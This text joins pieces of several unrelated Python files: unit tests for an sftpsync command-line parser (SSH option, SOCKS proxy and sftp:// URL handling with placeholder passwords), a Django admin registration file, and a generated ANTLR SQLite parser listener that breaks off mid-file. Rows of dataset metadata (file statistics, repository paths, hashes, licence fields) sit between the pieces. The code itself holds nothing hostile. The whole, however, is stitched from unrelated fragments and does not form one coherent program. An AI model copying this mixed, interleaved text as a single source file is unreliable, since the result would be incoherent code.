def test_configure_ssh_option_with_empty_value_using_whitespace(self):
with FakeStdOut() as out:
with FakeStdErr() as err:
self.assertRaisesRegex(SystemExit, '2', configure, ['-o', 'ProxyCommand '] + DEFAULT_ARGS)
self.assertIn('ERROR: Invalid SSH option: "ProxyCommand ', err.getvalue())
self.assertIn('sftpsync.py [OPTION]... SOURCE DESTINATION', out.getvalue())
def test_configure_ssh_option_unsupported_option_using_equal_sign(self):
with FakeStdOut() as out:
with FakeStdErr() as err:
self.assertRaisesRegex(SystemExit, '2', configure, ['-o', 'User=john'] + DEFAULT_ARGS)
error_message = err.getvalue()
self.assertIn('ERROR: Unsupported SSH option: "User". Only the following SSH options are currently supported: ProxyCommand.', error_message)
self.assertIn('sftpsync.py [OPTION]... SOURCE DESTINATION', out.getvalue())
def test_configure_ssh_option_unsupported_option_using_whitespace(self):
with FakeStdOut() as out:
with FakeStdErr() as err:
self.assertRaisesRegex(SystemExit, '2', configure, ['-o', 'User john'] + DEFAULT_ARGS)
error_message = err.getvalue()
self.assertIn('ERROR: Unsupported SSH option: "User". Only the following SSH options are currently supported: ProxyCommand.', error_message)
self.assertIn('sftpsync.py [OPTION]... SOURCE DESTINATION', out.getvalue())
def test_configure_proxy_host(self):
config = configure(['--proxy', 'proxy-server.example.com'] + DEFAULT_ARGS)
self.assertEqual(len(config['proxy']), 1)
self.assertEqual(config['proxy']['host'], 'proxy-server.example.com')
def test_configure_proxy_user_host(self):
config = configure(['--proxy', 'anonymous@proxy-server.example.com'] + DEFAULT_ARGS)
self.assertEqual(len(config['proxy']), 2)
self.assertEqual(config['proxy']['host'], 'proxy-server.example.com')
self.assertEqual(config['proxy']['user'], 'anonymous')
def test_configure_proxy_user_host_port(self):
config = configure(['--proxy', 'anonymous@proxy-server.example.com:1080'] + DEFAULT_ARGS)
self.assertEqual(len(config['proxy']), 3)
self.assertEqual(config['proxy']['host'], 'proxy-server.example.com')
self.assertEqual(config['proxy']['user'], 'anonymous')
self.assertEqual(config['proxy']['port'], '1080')
def test_configure_proxy_user_password_host(self):
config = configure(['--proxy', 'anonymous:password123@proxy-server.example.com'] + DEFAULT_ARGS)
self.assertEqual(len(config['proxy']), 3)
self.assertEqual(config['proxy']['host'], 'proxy-server.example.com')
self.assertEqual(config['proxy']['user'], 'anonymous')
self.assertEqual(config['proxy']['pass'], 'password123')
def test_configure_proxy_user_password_host_port(self):
config = configure(['--proxy', 'anonymous:password123@proxy-server.example.com:1080'] + DEFAULT_ARGS)
self.assertEqual(len(config['proxy']), 4)
self.assertEqual(config['proxy']['host'], 'proxy-server.example.com')
self.assertEqual(config['proxy']['user'], 'anonymous')
self.assertEqual(config['proxy']['pass'], 'password123')
self.assertEqual(config['proxy']['port'], '1080')
def test_configure_missing_proxy(self):
with FakeStdOut() as out:
with FakeStdErr() as err:
self.assertRaisesRegex(SystemExit, '2', configure, ['--proxy'])
self.assertIn('ERROR: option --proxy requires argument', err.getvalue())
self.assertIn('sftpsync.py [OPTION]... SOURCE DESTINATION', out.getvalue())
def test_configure_empty_proxy(self):
with FakeStdOut() as out:
with FakeStdErr() as err:
self.assertRaisesRegex(SystemExit, '2', configure, ['--proxy', ''] + DEFAULT_ARGS)
self.assertIn('ERROR: Invalid proxy: "".', err.getvalue())
self.assertIn('sftpsync.py [OPTION]... SOURCE DESTINATION', out.getvalue())
def test_configure_proxy_version_socks_4(self):
config = configure(['--proxy-version', 'SOCKS4'] + DEFAULT_ARGS)
self.assertEqual(config['proxy_version'], socks.SOCKS4)
def test_configure_proxy_version_socks_5(self):
config = configure(['--proxy-version', 'SOCKS5'] + DEFAULT_ARGS)
self.assertEqual(config['proxy_version'], socks.SOCKS5)
def test_configure_missing_proxy_version(self):
with FakeStdOut() as out:
with FakeStdErr() as err:
self.assertRaisesRegex(SystemExit, '2', configure, ['--proxy-version'])
self.assertIn('ERROR: option --proxy-version requires argument', err.getvalue())
self.assertIn('sftpsync.py [OPTION]... SOURCE DESTINATION', out.getvalue())
def test_configure_empty_proxy_version(self):
with FakeStdOut() as out:
with FakeStdErr() as err:
self.assertRaisesRegex(SystemExit, '2', configure, ['--proxy-version', ''] + DEFAULT_ARGS)
self.assertIn('ERROR: Invalid SOCKS proxy version: "". Please choose one of the following values: { SOCKS4, SOCKS5 }.', err.getvalue())
self.assertIn('sftpsync.py [OPTION]... SOURCE DESTINATION', out.getvalue())
def test_configure_invalid_proxy_version(self):
with FakeStdOut() as out:
with FakeStdErr() as err:
self.assertRaisesRegex(SystemExit, '2', configure, ['--proxy-version', 'SOCKS1337-which-does-not-exist'] + DEFAULT_ARGS)
self.assertIn('ERROR: Invalid SOCKS proxy version: "SOCKS1337-which-does-not-exist". Please choose one of the following values: { SOCKS4, SOCKS5 }.', err.getvalue())
self.assertIn('sftpsync.py [OPTION]... SOURCE DESTINATION', out.getvalue())
def test_configure_arguments_sftp_source_local_destination_user_password_host_port_path(self):
config = configure(['sftp://yoda:p4$$w0rd@sftp-server.example.com:22/data', '.'])
self.assertEqual(len(config['source']), 5)
self.assertEqual(config['source']['host'], 'sftp-server.example.com')
self.assertEqual(config['source']['user'], 'yoda')
self.assertEqual(config['source']['pass'], 'p4$$w0rd')
self.assertEqual(config['source']['port'], '22')
self.assertEqual(config['source']['path'], '/data')
self.assertEqual(config['destination'], '.')
def test_configure_arguments_sftp_source_local_destination_user_password_host_port(self):
config = configure(['sftp://yoda:p4$$w0rd@sftp-server.example.com:22', '.'])
self.assertEqual(len(config['source']), 4)
self.assertEqual(config['source']['host'], 'sftp-server.example.com')
self.assertEqual(config['source']['user'], 'yoda')
self.assertEqual(config['source']['pass'], 'p4$$w0rd')
self.assertEqual(config['source']['port'], '22')
def test_configure_arguments_sftp_source_local_destination_user_password_host(self):
config = configure(['sftp://yoda:p4$$w0rd@sftp-server.example.com', '.'])
self.assertEqual(len(config['source']), 3)
self.assertEqual(config['source']['host'], 'sftp-server.example.com')
self.assertEqual(config['source']['user'], 'yoda')
self.assertEqual(config['source']['pass'], 'p4$$w0rd')
def test_configure_arguments_sftp_source_local_destination_user_host(self):
config = configure(['sftp://yoda@sftp-server.example.com', '.'])
self.assertEqual(len(config['source']), 2)
self.assertEqual(config['source']['host'], 'sftp-server.example.com')
self.assertEqual(config['source']['user'], 'yoda')
def test_configure_arguments_sftp_source_local_destination_host(self):
config = configure(['sftp://sftp-server.example.com', '.'])
self.assertEqual(len(config['source']), 1)
self.assertEqual(config['source']['host'], 'sftp-server.example.com')
def test_configure_arguments_sftp_source_local_destination_user_password_host_path(self):
config = configure(['sftp://yoda:p4$$w0rd@sftp-server.example.com:/data', '.'])
self.assertEqual(len(config['source']), 4)
self.assertEqual(config['source']['host'], 'sftp-server.example.com')
self.assertEqual(config['source']['user'], 'yoda')
self.assertEqual(config['source']['pass'], 'p4$$w0rd')
self.assertEqual(config['source']['path'], '/data')
def test_configure_arguments_sftp_source_local_destination_user_password_host_path_without_colon(self):
config = configure(['sftp://yoda:p4$$w0rd@sftp-server.example.com/data', '.'])
self.assertEqual(len(config['source']), 4)
self.assertEqual(config['source']['host'], 'sftp-server.example.com')
self.assertEqual(config['source']['user'], 'yoda')
self.assertEqual(config['source']['pass'], 'p4$$w0rd')
self.assertEqual(config['source']['path'], '/data')
def test_configure_arguments_sftp_source_local_destination_current_folder(self):
config = configure(['sftp://yoda:p4$$w0rd@sftp-server.example.com:22/data', '.'])
self.assertEqual(config['destination'], '.')
def test_configure_arguments_sftp_source_local_destination_parent_folder(self):
config = configure(['sftp://yoda:p4$$w0rd@sftp-server.example.com:22/data', '..'])
self.assertEqual(config['destination'], '..')
def test_configure_arguments_sftp_source_local_destination_root_folder(self):
config = configure(['sftp://yoda:p4$$w0rd@sftp-server.example.com:22/data', path_for('.')])
self.assertEqual(config['destination'], path_for('.'))
def test_configure_arguments_sftp_source_local_destination_non_existing_destination_folder(self):
with FakeStdOut() as out:
with FakeStdErr() as err:
self.assertRaisesRegex(SystemExit, '2', configure, ['sftp://yoda:p4$$w0rd@sftp-server.example.com:22/data', '/non/existing/folder'])
self.assertIn('ERROR: Invalid path. "/non/existing/folder" does NOT exist.', err.getvalue())
self.assertIn('sftpsync.py [OPTION]... SOURCE DESTINATION', out.getvalue())
def test_configure_arguments_sftp_source_local_destination_non_writable_folder(self):
with NonWritableFolder() as path:
with FakeStdOut() as out:
with FakeStdErr() as err:
self.assertRaisesRegex(SystemExit, '2', configure, ['sftp://yoda:p4$$w0rd@sftp-server.example.com:22/data', path])
self.assertIn('ERROR: Invalid path. "%s" exists but user "%s" does NOT have write access.' % (path, getuser()), err.getvalue())
self.assertIn('sftpsync.py [OPTION]... SOURCE DESTINATION', out.getvalue())
def test_configure_arguments_local_source_sftp_destination_user_password_host_port_path(self):
config = configure(['.', 'sftp://yoda:p4$$w0rd@sftp-server.example.com:22/data'])
self.assertEqual(config['source'], '.')
self.assertEqual(len(config['destination']), 5)
self.assertEqual(config['destination']['host'], 'sftp-server.example.com')
self.assertEqual(config['destination']['user'], 'yoda')
self.assertEqual(config['destination']['pass'], 'p4$$w0rd')
self.assertEqual(config['destination']['port'], '22')
self.assertEqual(config['destination']['path'], '/data')
def test_configure_arguments_local_source_sftp_destination_non_existing_source_folder(self):
with FakeStdOut() as out:
with FakeStdErr() as err:
self.assertRaisesRegex(SystemExit, '2', configure, ['/non/existing/folder', 'sftp://yoda:p4$$w0rd@sftp-server.example.com:22/data'])
self.assertIn('ERROR: Invalid path. "/non/existing/folder" does NOT exist.', err.getvalue())
self.assertIn('sftpsync.py [OPTION]... SOURCE DESTINATION', out.getvalue())
def test_configure_arguments_local_source_sftp_destination_non_readable_folder(self):
with NonReadableFolder() as path:
with FakeStdOut() as out:
with FakeStdErr() as err:
self.assertRaisesRegex(SystemExit, '2', configure, [path, 'sftp://yoda:p4$$w0rd@sftp-server.example.com:22/data'])
self.assertIn('ERROR: Invalid path. "%s" exists but user "%s" does NOT have read access.' % (path, getuser()), err.getvalue())
self.assertIn('sftpsync.py [OPTION]... SOURCE DESTINATION', out.getvalue())
if __name__ == '__main__':
main()
| 56.568129 | 181 | 0.6502 | 2,751 | 24,494 | 5.610687 | 0.062523 | 0.079689 | 0.089796 | 0.036929 | 0.906511 | 0.851636 | 0.826822 | 0.811532 | 0.790994 | 0.743116 | 0 | 0.010075 | 0.205765 | 24,494 | 432 | 182 | 56.699074 | 0.783335 | 0.002899 | 0 | 0.466292 | 0 | 0.014045 | 0.257382 | 0.060363 | 0 | 0 | 0 | 0 | 0.516854 | 1 | 0.179775 | false | 0.05618 | 0.016854 | 0 | 0.199438 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
48e60bfb4af819d390b05676815aa72d27e4a443 | 210 | py | Python | backend/shops/admin.py | singsaker/intern | 9376732c6d537f46443ad43afa51e82df2005da8 | [
"MIT"
] | 4 | 2021-10-06T19:09:12.000Z | 2022-03-28T12:14:42.000Z | backend/shops/admin.py | singsaker/intern | 9376732c6d537f46443ad43afa51e82df2005da8 | [
"MIT"
] | 2 | 2021-11-30T16:07:05.000Z | 2022-02-17T23:57:00.000Z | backend/shops/admin.py | singsaker/intern | 9376732c6d537f46443ad43afa51e82df2005da8 | [
"MIT"
] | null | null | null | from django.contrib import admin
from .models import Product, ProductCategory, Sale, Shop
admin.site.register(Shop)
admin.site.register(Product)
admin.site.register(ProductCategory)
admin.site.register(Sale)
| 23.333333 | 56 | 0.819048 | 28 | 210 | 6.142857 | 0.428571 | 0.209302 | 0.395349 | 0.244186 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.080952 | 210 | 8 | 57 | 26.25 | 0.891192 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
48f970ee067848405d55da3342d8b92975c6ddfa | 34,449 | py | Python | src/pyensae/languages/SQLiteParserListener.py | sdpython/pyensae | ada4dbb0b9901bf481eff2ea239e74ed964d93b0 | [
"MIT"
] | 28 | 2015-07-19T21:20:51.000Z | 2022-02-16T11:50:53.000Z | src/pyensae/languages/SQLiteParserListener.py | sdpython/pyensae | ada4dbb0b9901bf481eff2ea239e74ed964d93b0 | [
"MIT"
] | 34 | 2015-06-16T15:38:25.000Z | 2021-12-29T11:04:01.000Z | src/pyensae/languages/SQLiteParserListener.py | sdpython/pyensae | ada4dbb0b9901bf481eff2ea239e74ed964d93b0 | [
"MIT"
] | 27 | 2015-01-13T08:24:22.000Z | 2022-03-31T14:51:23.000Z | # Generated from \SQLiteParser.g4 by ANTLR 4.9
from antlr4 import *
if __name__ is not None and "." in __name__:
from .SQLiteParser import SQLiteParser
else:
from SQLiteParser import SQLiteParser
# This class defines a complete listener for a parse tree produced by SQLiteParser.
class SQLiteParserListener(ParseTreeListener):
# Enter a parse tree produced by SQLiteParser#parse.
def enterParse(self, ctx: SQLiteParser.ParseContext):
pass
# Exit a parse tree produced by SQLiteParser#parse.
def exitParse(self, ctx: SQLiteParser.ParseContext):
pass
# Enter a parse tree produced by SQLiteParser#sql_stmt_list.
def enterSql_stmt_list(self, ctx: SQLiteParser.Sql_stmt_listContext):
pass
# Exit a parse tree produced by SQLiteParser#sql_stmt_list.
def exitSql_stmt_list(self, ctx: SQLiteParser.Sql_stmt_listContext):
pass
# Enter a parse tree produced by SQLiteParser#sql_stmt.
def enterSql_stmt(self, ctx: SQLiteParser.Sql_stmtContext):
pass
# Exit a parse tree produced by SQLiteParser#sql_stmt.
def exitSql_stmt(self, ctx: SQLiteParser.Sql_stmtContext):
pass
# Enter a parse tree produced by SQLiteParser#alter_table_stmt.
def enterAlter_table_stmt(self, ctx: SQLiteParser.Alter_table_stmtContext):
pass
# Exit a parse tree produced by SQLiteParser#alter_table_stmt.
def exitAlter_table_stmt(self, ctx: SQLiteParser.Alter_table_stmtContext):
pass
# Enter a parse tree produced by SQLiteParser#analyze_stmt.
def enterAnalyze_stmt(self, ctx: SQLiteParser.Analyze_stmtContext):
pass
# Exit a parse tree produced by SQLiteParser#analyze_stmt.
def exitAnalyze_stmt(self, ctx: SQLiteParser.Analyze_stmtContext):
pass
# Enter a parse tree produced by SQLiteParser#attach_stmt.
def enterAttach_stmt(self, ctx: SQLiteParser.Attach_stmtContext):
pass
# Exit a parse tree produced by SQLiteParser#attach_stmt.
def exitAttach_stmt(self, ctx: SQLiteParser.Attach_stmtContext):
pass
# Enter a parse tree produced by SQLiteParser#begin_stmt.
def enterBegin_stmt(self, ctx: SQLiteParser.Begin_stmtContext):
pass
# Exit a parse tree produced by SQLiteParser#begin_stmt.
def exitBegin_stmt(self, ctx: SQLiteParser.Begin_stmtContext):
pass
# Enter a parse tree produced by SQLiteParser#commit_stmt.
def enterCommit_stmt(self, ctx: SQLiteParser.Commit_stmtContext):
pass
# Exit a parse tree produced by SQLiteParser#commit_stmt.
def exitCommit_stmt(self, ctx: SQLiteParser.Commit_stmtContext):
pass
# Enter a parse tree produced by SQLiteParser#rollback_stmt.
def enterRollback_stmt(self, ctx: SQLiteParser.Rollback_stmtContext):
pass
# Exit a parse tree produced by SQLiteParser#rollback_stmt.
def exitRollback_stmt(self, ctx: SQLiteParser.Rollback_stmtContext):
pass
# Enter a parse tree produced by SQLiteParser#savepoint_stmt.
def enterSavepoint_stmt(self, ctx: SQLiteParser.Savepoint_stmtContext):
pass
# Exit a parse tree produced by SQLiteParser#savepoint_stmt.
def exitSavepoint_stmt(self, ctx: SQLiteParser.Savepoint_stmtContext):
pass
# Enter a parse tree produced by SQLiteParser#release_stmt.
def enterRelease_stmt(self, ctx: SQLiteParser.Release_stmtContext):
pass
# Exit a parse tree produced by SQLiteParser#release_stmt.
def exitRelease_stmt(self, ctx: SQLiteParser.Release_stmtContext):
pass
# Enter a parse tree produced by SQLiteParser#create_index_stmt.
def enterCreate_index_stmt(self, ctx: SQLiteParser.Create_index_stmtContext):
pass
# Exit a parse tree produced by SQLiteParser#create_index_stmt.
def exitCreate_index_stmt(self, ctx: SQLiteParser.Create_index_stmtContext):
pass
# Enter a parse tree produced by SQLiteParser#indexed_column.
def enterIndexed_column(self, ctx: SQLiteParser.Indexed_columnContext):
pass
# Exit a parse tree produced by SQLiteParser#indexed_column.
def exitIndexed_column(self, ctx: SQLiteParser.Indexed_columnContext):
pass
# Enter a parse tree produced by SQLiteParser#create_table_stmt.
def enterCreate_table_stmt(self, ctx: SQLiteParser.Create_table_stmtContext):
pass
# Exit a parse tree produced by SQLiteParser#create_table_stmt.
def exitCreate_table_stmt(self, ctx: SQLiteParser.Create_table_stmtContext):
pass
# Enter a parse tree produced by SQLiteParser#column_def.
def enterColumn_def(self, ctx: SQLiteParser.Column_defContext):
pass
# Exit a parse tree produced by SQLiteParser#column_def.
def exitColumn_def(self, ctx: SQLiteParser.Column_defContext):
pass
# Enter a parse tree produced by SQLiteParser#type_name.
def enterType_name(self, ctx: SQLiteParser.Type_nameContext):
pass
# Exit a parse tree produced by SQLiteParser#type_name.
def exitType_name(self, ctx: SQLiteParser.Type_nameContext):
pass
# Enter a parse tree produced by SQLiteParser#column_constraint.
def enterColumn_constraint(self, ctx: SQLiteParser.Column_constraintContext):
pass
# Exit a parse tree produced by SQLiteParser#column_constraint.
def exitColumn_constraint(self, ctx: SQLiteParser.Column_constraintContext):
pass
# Enter a parse tree produced by SQLiteParser#signed_number.
def enterSigned_number(self, ctx: SQLiteParser.Signed_numberContext):
pass
# Exit a parse tree produced by SQLiteParser#signed_number.
def exitSigned_number(self, ctx: SQLiteParser.Signed_numberContext):
pass
# Enter a parse tree produced by SQLiteParser#table_constraint.
def enterTable_constraint(self, ctx: SQLiteParser.Table_constraintContext):
pass
# Exit a parse tree produced by SQLiteParser#table_constraint.
def exitTable_constraint(self, ctx: SQLiteParser.Table_constraintContext):
pass
# Enter a parse tree produced by SQLiteParser#foreign_key_clause.
def enterForeign_key_clause(self, ctx: SQLiteParser.Foreign_key_clauseContext):
pass
# Exit a parse tree produced by SQLiteParser#foreign_key_clause.
def exitForeign_key_clause(self, ctx: SQLiteParser.Foreign_key_clauseContext):
pass
# Enter a parse tree produced by SQLiteParser#conflict_clause.
def enterConflict_clause(self, ctx: SQLiteParser.Conflict_clauseContext):
pass
# Exit a parse tree produced by SQLiteParser#conflict_clause.
def exitConflict_clause(self, ctx: SQLiteParser.Conflict_clauseContext):
pass
# Enter a parse tree produced by SQLiteParser#create_trigger_stmt.
def enterCreate_trigger_stmt(self, ctx: SQLiteParser.Create_trigger_stmtContext):
pass
# Exit a parse tree produced by SQLiteParser#create_trigger_stmt.
def exitCreate_trigger_stmt(self, ctx: SQLiteParser.Create_trigger_stmtContext):
pass
# Enter a parse tree produced by SQLiteParser#create_view_stmt.
def enterCreate_view_stmt(self, ctx: SQLiteParser.Create_view_stmtContext):
pass
# Exit a parse tree produced by SQLiteParser#create_view_stmt.
def exitCreate_view_stmt(self, ctx: SQLiteParser.Create_view_stmtContext):
pass
# Enter a parse tree produced by SQLiteParser#create_virtual_table_stmt.
def enterCreate_virtual_table_stmt(self, ctx: SQLiteParser.Create_virtual_table_stmtContext):
pass
# Exit a parse tree produced by SQLiteParser#create_virtual_table_stmt.
def exitCreate_virtual_table_stmt(self, ctx: SQLiteParser.Create_virtual_table_stmtContext):
pass
# Enter a parse tree produced by SQLiteParser#with_clause.
def enterWith_clause(self, ctx: SQLiteParser.With_clauseContext):
pass
# Exit a parse tree produced by SQLiteParser#with_clause.
def exitWith_clause(self, ctx: SQLiteParser.With_clauseContext):
pass
# Enter a parse tree produced by SQLiteParser#cte_table_name.
def enterCte_table_name(self, ctx: SQLiteParser.Cte_table_nameContext):
pass
# Exit a parse tree produced by SQLiteParser#cte_table_name.
def exitCte_table_name(self, ctx: SQLiteParser.Cte_table_nameContext):
pass
# Enter a parse tree produced by SQLiteParser#recursive_cte.
def enterRecursive_cte(self, ctx: SQLiteParser.Recursive_cteContext):
pass
# Exit a parse tree produced by SQLiteParser#recursive_cte.
def exitRecursive_cte(self, ctx: SQLiteParser.Recursive_cteContext):
pass
# Enter a parse tree produced by SQLiteParser#common_table_expression.
def enterCommon_table_expression(self, ctx: SQLiteParser.Common_table_expressionContext):
pass
# Exit a parse tree produced by SQLiteParser#common_table_expression.
def exitCommon_table_expression(self, ctx: SQLiteParser.Common_table_expressionContext):
pass
# Enter a parse tree produced by SQLiteParser#delete_stmt.
def enterDelete_stmt(self, ctx: SQLiteParser.Delete_stmtContext):
pass
# Exit a parse tree produced by SQLiteParser#delete_stmt.
def exitDelete_stmt(self, ctx: SQLiteParser.Delete_stmtContext):
pass
# Enter a parse tree produced by SQLiteParser#delete_stmt_limited.
def enterDelete_stmt_limited(self, ctx: SQLiteParser.Delete_stmt_limitedContext):
pass
# Exit a parse tree produced by SQLiteParser#delete_stmt_limited.
def exitDelete_stmt_limited(self, ctx: SQLiteParser.Delete_stmt_limitedContext):
pass
# Enter a parse tree produced by SQLiteParser#detach_stmt.
def enterDetach_stmt(self, ctx: SQLiteParser.Detach_stmtContext):
pass
# Exit a parse tree produced by SQLiteParser#detach_stmt.
def exitDetach_stmt(self, ctx: SQLiteParser.Detach_stmtContext):
pass
# Enter a parse tree produced by SQLiteParser#drop_stmt.
def enterDrop_stmt(self, ctx: SQLiteParser.Drop_stmtContext):
pass
# Exit a parse tree produced by SQLiteParser#drop_stmt.
def exitDrop_stmt(self, ctx: SQLiteParser.Drop_stmtContext):
pass
# Enter a parse tree produced by SQLiteParser#expr.
def enterExpr(self, ctx: SQLiteParser.ExprContext):
pass
# Exit a parse tree produced by SQLiteParser#expr.
def exitExpr(self, ctx: SQLiteParser.ExprContext):
pass
# Enter a parse tree produced by SQLiteParser#raise_function.
def enterRaise_function(self, ctx: SQLiteParser.Raise_functionContext):
pass
# Exit a parse tree produced by SQLiteParser#raise_function.
def exitRaise_function(self, ctx: SQLiteParser.Raise_functionContext):
pass
# Enter a parse tree produced by SQLiteParser#literal_value.
def enterLiteral_value(self, ctx: SQLiteParser.Literal_valueContext):
pass
# Exit a parse tree produced by SQLiteParser#literal_value.
def exitLiteral_value(self, ctx: SQLiteParser.Literal_valueContext):
pass
# Enter a parse tree produced by SQLiteParser#insert_stmt.
def enterInsert_stmt(self, ctx: SQLiteParser.Insert_stmtContext):
pass
# Exit a parse tree produced by SQLiteParser#insert_stmt.
def exitInsert_stmt(self, ctx: SQLiteParser.Insert_stmtContext):
pass
# Enter a parse tree produced by SQLiteParser#upsert_clause.
def enterUpsert_clause(self, ctx: SQLiteParser.Upsert_clauseContext):
pass
# Exit a parse tree produced by SQLiteParser#upsert_clause.
def exitUpsert_clause(self, ctx: SQLiteParser.Upsert_clauseContext):
pass
# Enter a parse tree produced by SQLiteParser#pragma_stmt.
def enterPragma_stmt(self, ctx: SQLiteParser.Pragma_stmtContext):
pass
# Exit a parse tree produced by SQLiteParser#pragma_stmt.
def exitPragma_stmt(self, ctx: SQLiteParser.Pragma_stmtContext):
pass
# Enter a parse tree produced by SQLiteParser#pragma_value.
def enterPragma_value(self, ctx: SQLiteParser.Pragma_valueContext):
pass
# Exit a parse tree produced by SQLiteParser#pragma_value.
def exitPragma_value(self, ctx: SQLiteParser.Pragma_valueContext):
pass
# Enter a parse tree produced by SQLiteParser#reindex_stmt.
def enterReindex_stmt(self, ctx: SQLiteParser.Reindex_stmtContext):
pass
# Exit a parse tree produced by SQLiteParser#reindex_stmt.
def exitReindex_stmt(self, ctx: SQLiteParser.Reindex_stmtContext):
pass
# Enter a parse tree produced by SQLiteParser#select_stmt.
def enterSelect_stmt(self, ctx: SQLiteParser.Select_stmtContext):
pass
# Exit a parse tree produced by SQLiteParser#select_stmt.
def exitSelect_stmt(self, ctx: SQLiteParser.Select_stmtContext):
pass
# Enter a parse tree produced by SQLiteParser#join_clause.
def enterJoin_clause(self, ctx: SQLiteParser.Join_clauseContext):
pass
# Exit a parse tree produced by SQLiteParser#join_clause.
def exitJoin_clause(self, ctx: SQLiteParser.Join_clauseContext):
pass
# Enter a parse tree produced by SQLiteParser#select_core.
def enterSelect_core(self, ctx: SQLiteParser.Select_coreContext):
pass
# Exit a parse tree produced by SQLiteParser#select_core.
def exitSelect_core(self, ctx: SQLiteParser.Select_coreContext):
pass
# Enter a parse tree produced by SQLiteParser#factored_select_stmt.
def enterFactored_select_stmt(self, ctx: SQLiteParser.Factored_select_stmtContext):
pass
# Exit a parse tree produced by SQLiteParser#factored_select_stmt.
def exitFactored_select_stmt(self, ctx: SQLiteParser.Factored_select_stmtContext):
pass
# Enter a parse tree produced by SQLiteParser#simple_select_stmt.
def enterSimple_select_stmt(self, ctx: SQLiteParser.Simple_select_stmtContext):
pass
# Exit a parse tree produced by SQLiteParser#simple_select_stmt.
def exitSimple_select_stmt(self, ctx: SQLiteParser.Simple_select_stmtContext):
pass
# Enter a parse tree produced by SQLiteParser#compound_select_stmt.
def enterCompound_select_stmt(self, ctx: SQLiteParser.Compound_select_stmtContext):
pass
# Exit a parse tree produced by SQLiteParser#compound_select_stmt.
def exitCompound_select_stmt(self, ctx: SQLiteParser.Compound_select_stmtContext):
pass
# Enter a parse tree produced by SQLiteParser#table_or_subquery.
def enterTable_or_subquery(self, ctx: SQLiteParser.Table_or_subqueryContext):
pass
# Exit a parse tree produced by SQLiteParser#table_or_subquery.
def exitTable_or_subquery(self, ctx: SQLiteParser.Table_or_subqueryContext):
pass
# Enter a parse tree produced by SQLiteParser#result_column.
def enterResult_column(self, ctx: SQLiteParser.Result_columnContext):
pass
# Exit a parse tree produced by SQLiteParser#result_column.
def exitResult_column(self, ctx: SQLiteParser.Result_columnContext):
pass
# Enter a parse tree produced by SQLiteParser#join_operator.
def enterJoin_operator(self, ctx: SQLiteParser.Join_operatorContext):
pass
# Exit a parse tree produced by SQLiteParser#join_operator.
def exitJoin_operator(self, ctx: SQLiteParser.Join_operatorContext):
pass
# Enter a parse tree produced by SQLiteParser#join_constraint.
def enterJoin_constraint(self, ctx: SQLiteParser.Join_constraintContext):
pass
# Exit a parse tree produced by SQLiteParser#join_constraint.
def exitJoin_constraint(self, ctx: SQLiteParser.Join_constraintContext):
pass
# Enter a parse tree produced by SQLiteParser#compound_operator.
def enterCompound_operator(self, ctx: SQLiteParser.Compound_operatorContext):
pass
# Exit a parse tree produced by SQLiteParser#compound_operator.
def exitCompound_operator(self, ctx: SQLiteParser.Compound_operatorContext):
pass
# Enter a parse tree produced by SQLiteParser#update_stmt.
def enterUpdate_stmt(self, ctx: SQLiteParser.Update_stmtContext):
pass
# Exit a parse tree produced by SQLiteParser#update_stmt.
def exitUpdate_stmt(self, ctx: SQLiteParser.Update_stmtContext):
pass
# Enter a parse tree produced by SQLiteParser#column_name_list.
def enterColumn_name_list(self, ctx: SQLiteParser.Column_name_listContext):
pass
# Exit a parse tree produced by SQLiteParser#column_name_list.
def exitColumn_name_list(self, ctx: SQLiteParser.Column_name_listContext):
pass
# Enter a parse tree produced by SQLiteParser#update_stmt_limited.
def enterUpdate_stmt_limited(self, ctx: SQLiteParser.Update_stmt_limitedContext):
pass
# Exit a parse tree produced by SQLiteParser#update_stmt_limited.
def exitUpdate_stmt_limited(self, ctx: SQLiteParser.Update_stmt_limitedContext):
pass
# Enter a parse tree produced by SQLiteParser#qualified_table_name.
def enterQualified_table_name(self, ctx: SQLiteParser.Qualified_table_nameContext):
pass
# Exit a parse tree produced by SQLiteParser#qualified_table_name.
def exitQualified_table_name(self, ctx: SQLiteParser.Qualified_table_nameContext):
pass
# Enter a parse tree produced by SQLiteParser#vacuum_stmt.
def enterVacuum_stmt(self, ctx: SQLiteParser.Vacuum_stmtContext):
pass
# Exit a parse tree produced by SQLiteParser#vacuum_stmt.
def exitVacuum_stmt(self, ctx: SQLiteParser.Vacuum_stmtContext):
pass
# Enter a parse tree produced by SQLiteParser#filter_clause.
def enterFilter_clause(self, ctx: SQLiteParser.Filter_clauseContext):
pass
# Exit a parse tree produced by SQLiteParser#filter_clause.
def exitFilter_clause(self, ctx: SQLiteParser.Filter_clauseContext):
pass
# Enter a parse tree produced by SQLiteParser#window_defn.
def enterWindow_defn(self, ctx: SQLiteParser.Window_defnContext):
pass
# Exit a parse tree produced by SQLiteParser#window_defn.
def exitWindow_defn(self, ctx: SQLiteParser.Window_defnContext):
pass
# Enter a parse tree produced by SQLiteParser#over_clause.
def enterOver_clause(self, ctx: SQLiteParser.Over_clauseContext):
pass
# Exit a parse tree produced by SQLiteParser#over_clause.
def exitOver_clause(self, ctx: SQLiteParser.Over_clauseContext):
pass
# Enter a parse tree produced by SQLiteParser#frame_spec.
def enterFrame_spec(self, ctx: SQLiteParser.Frame_specContext):
pass
# Exit a parse tree produced by SQLiteParser#frame_spec.
def exitFrame_spec(self, ctx: SQLiteParser.Frame_specContext):
pass
# Enter a parse tree produced by SQLiteParser#frame_clause.
def enterFrame_clause(self, ctx: SQLiteParser.Frame_clauseContext):
pass
# Exit a parse tree produced by SQLiteParser#frame_clause.
def exitFrame_clause(self, ctx: SQLiteParser.Frame_clauseContext):
pass
# Enter a parse tree produced by SQLiteParser#simple_function_invocation.
